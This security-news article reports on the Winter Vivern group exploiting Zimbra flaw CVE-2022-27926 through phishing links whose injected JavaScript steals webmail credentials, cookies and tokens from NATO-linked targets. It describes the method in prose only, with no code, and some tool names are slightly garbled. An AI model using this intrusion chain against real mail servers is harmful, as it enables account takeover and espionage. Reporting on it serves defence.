HQ/EMEAFind out how we can help your business
The Russian-based malicious threat group, Winter Vivern, has been exploiting the Zimbra vulnerabilities since last month to steal emails from NATO officials, military personnel, diplomats, and governments.
Based on reports, the Russian hacking group used impersonated European agency websites that fight cybercrime to disseminate malware-laden virus scanner software. The researchers confirmed that the exploited Zimbra vulnerability is CVE-2022-27926 on the Zimbra Collaboration servers.
The threat actors accessed these communication servers to target NATO-affiliated individuals and organisations.
The Winter Vivern operators start a cyberattack by reviewing a target if it has unpatched webmail platforms.
According to the investigation, the Winter Vivern group initiates attacks by scanning the target if it has outdated webmail platforms via the Aconitic tool flaw scanner.
Subsequently, the threat actors will send a phishing email to the targeted address. The actors will also spoof someone related to the organisation to increase the email’s authenticity.
However, the compromised emails contain a link that leverages the earlier-mentioned flaw that targets infected Zimbra infrastructure to deploy additional JS payloads into the webpage.
The additional payloads could steal numerous details from the compromised Zimbra endpoint, such as usernames, passwords, and cookies. This data will enable threat actors to breach a target email account efficiently.
Furthermore, the compromised JavaScript could replicate and emulate the default JavaScript on a webmail portal to harvest return key web request information that contains usernames, passwords, and tokens.
This new development shows how the threat actors put effort into employing complex capabilities within their attack tools. Hence, their phishing campaigns could have a more straightforward method and more efficient operation.
Other research also revealed that the Winter Vivern group had included parts of a legitimate JavaScript that operates in a webmail portal to mix it with normal operations to bypass security detections.
These threat actors could collect critical data on compromised webmails or establish persistence to monitor a target’s behaviour for an extended period. Finally, these miscreants could also use the compromised accounts to execute lateral phishing attacks to infiltrate more organisations.
